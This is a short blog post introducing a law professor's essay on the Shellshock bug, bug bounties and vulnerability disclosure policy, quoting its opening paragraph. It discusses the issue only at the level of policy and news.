Bug bounties, vulnerability disclosure, and Shellshock


My colleague Professor Kristen Eichensehr has a very interesting post at Just Security about the newly exposed Shellshock vulnerability, bug bounties, the bug disclosure system, and the complex interactions of the U.S. government and private ordering when it comes to computer security. The opening paragraph:

Last week news broke of a major software bug—now termed "Shellshock"—in open-source software used in Linux and UNIX operating systems. Security experts have warned that the vulnerability is particularly troubling because it allows attackers to take control of machines running the software and because there may be half a billion such devices. Soon after the disclosure of the bug and patches aimed to protect against it, the blowback started: security firms began to report seeing attempts to exploit the vulnerability (see here and here).